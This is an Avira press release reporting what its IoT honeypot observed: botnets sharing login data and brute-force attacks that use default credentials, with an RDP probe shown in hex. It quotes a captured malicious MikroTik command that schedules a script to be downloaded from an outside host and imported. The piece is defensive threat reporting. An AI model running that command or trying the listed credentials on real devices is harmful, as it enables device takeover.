< BackTuesday, October 22, 2019

Avira honeypot uncovers hacker coordination and stand-alone strategies for attacking your smart devices

Tettnang, Germany, October 22, 2019 - How can an attacker in Country A find and attack a device in Country B? The answer is multi-layered. Attackers frequently use an IP/Port scanning scripts to find open ports on a device, with each open port linked to a corresponding service that communicates over it.

Essentially, the attackers are launching an automated search for open doors and windows. The IP/Port scanner itself can be very basic and simple to write at the entry level – or more complex depending on the attacker’s skill or objectives.

It takes just minutes for an attacker to find a connected device with open ports. The Avira IoT honeypot, with profiles of smart TVs, routers and IP cameras, was attacked within five minutes of going live. In just 30 minutes, it had experienced a range of attacks directed at devices using the telnet, SSH, and any device running on Android.

Sharing is caring

These scanning scripts may appear to be from autonomous botnets, each individually probing for open ports or vulnerable services – but not always. Some attacking botnets are interconnected, with sharing codes and information behind the scene about potential infected hosts. This automated data exchange begins within minutes of a script spotting an open port – and is followed by other botnets starting their assault. Shown below is a sequence of related attacks:

Attack no.

Date

Port

IP

Duration

Username

Password

Description

17357

Wed, 18 Sep 2019 10:48:44 (UTC)

22 (Telnet)

 79.36.*.*

3.827 sec

root

zlxx.

Gathers information. Does not do anything malicious.

17372

Wed, 18 Sep 2019 10:48:49 (UTC)

22 (Telnet)

178.128.*.*

87.575 sec

root

zlxx.

The real attack. Downloads a malware and infects the device

On Wed, 18 Sep 2019 / 10:48:44 (UTC) someone from Italy (more accurately a script) successfully logged into the honeypot with the username/password combination of "root" and "zlxx."  This information was immediately shared with others. Five seconds later, someone from Singapore logged in with the same credential and infected the device.

This data sharing and attack coordination shows that attackers have succeeded in a basic division of labor and establishing inter-bot communication. Their first attack phase is to discover vulnerable devices and find a way in. The second phase is the actual device infection and gaining persistence.

Blind Shooting - Brute attacks:

Sharing data is the exception at the moment. Sometimes an entire attack is conducted in one session. This is essentially a brute-force shotgun attack in the dark where all devices are targeted, exposed and vulnerable ones take the damage, and the rest survive. Below are three actual examples of brute-force attacks.

Episode one:

We observed an attack on Wed, 18 Sep 2019 11:32:59 (UTC) from Ireland:

Attack no.

Date

Port

IP

Duration

Username

Password

Description

17501

Wed, 18 Sep 2019 11:32:59 (UTC)

23 (SSH)

 185.234.*.*

38.482 sec

Root

nosoup4u

Downloads a malware and infects the device.

If we look at the prior and subsequent connections to the honeypot, we see that this attack came out of the blue. Someone just logged in, infected the system and left. 

Attack no.

Date

Port

IP

Duration

Username

Password

Description

7193

Tue, 17 Sep 2019 15:47:29 (UTC)

23 (SSH)

 185.234. .*.*

38.117 sec

Root

nosoup4u

Downloads a malware and infects the device.

The attacker appears to have randomly or sequentially selected its victims and attacked them without even changing the username/password combination. Analysis of the used credentials reveals that these are the default credentials for DreamPlug routers. While every router gets the attack, it only hurts DreamPlug routers.

Episode two:

Attackers are also mixing ports and services in the blind hope of finding a vulnerable target. The honeypot caught an incoming attack on port 5555, the default port for ADB. However, the attack itself did not comply with the ADB protocol. Researchers dumped the attacked vector to find out more:

  • 03 00 00 2F 2A E0 00 00  00 00 00 43 6F 6F 6B 69  .../*......Cooki 
  • 0010  65 3A 20 6D 73 74 73 68  61 73 68 3D 41 64 6D 69  e: mstshash=Admi 
  • 0020  6E 69 73 74 72 0D 0A 01  00 08 00 01 00 00 00     nistr..........

Their detective work revealed that this was an attack targeting RDP (Remote Desktop Protocol) which usually originates from Russia. However, the attacking vector had nothing to do with ADB (Android Debug Bridge). The attackers simply saw an open port, sent a blind attack targeting RDP with the hope that it would find a RDP server on the other end.

Episode three:

Similar to episode two, the honeypot caught another attack on SSH – a service used almost everywhere, from huge mainframes, servers, enterprises, routers, IP cameras, and smartphones.

/system scheduler add name="U6" interval=10m on-event="/tool fetch url=http://1awesome.net/poll/ea06e989-5ff1-424d-9327-5d143acb597b mode=http dst-path=7wmp0b4s.rsc\\r\\n/import 7wmp0b4s.rsc" policy=api,ftp,local,password,policy,read,reboot,sensitive,sniff,ssh,telnet,test,web,winbox,write

That is a malicious Mikrotik script which only targets Mikrotik devices and has no effect on those from other manufacturers. Again, a shotgun type approach which can only work a fraction of the time.

Attackers are looking, sharing, and acting

Attackers find your device because they are always looking for open ports and vulnerable devices. Every minute, the Avira honeypot collects almost ten attacks - an average of 14,125 attacks each day on just one individual device. An open port is an invitation that will not be refused.

Sharing is increasingly going to be the name of the game. Attackers have learned how to share data about your devices and this will raise the risks for. Armed with info on open ports, attacks will happen – either a more subtle coordinated approach or a brute force attack. This attack strategy is indirectly supported by device manufacturers not implementing security into product design with blank and weak default passwords and poor device installation processes. 

Block attackers at the doorway with Avira

The lack of smart device security is systemic. A substantial number of smart devices have not been built with security in mind. It’s also not possible for the average user to make many of the needed security changes.

This is why Avira has developed SafeThings™ -- comprehensive protection for all internet connected devices in the home. For more information on Avira insights into smart device security and on how Avira SafeThings helps ISPs and router manufacturers protect their customers, please contact us at #MWC19 Los Angeles - South Hall #2540.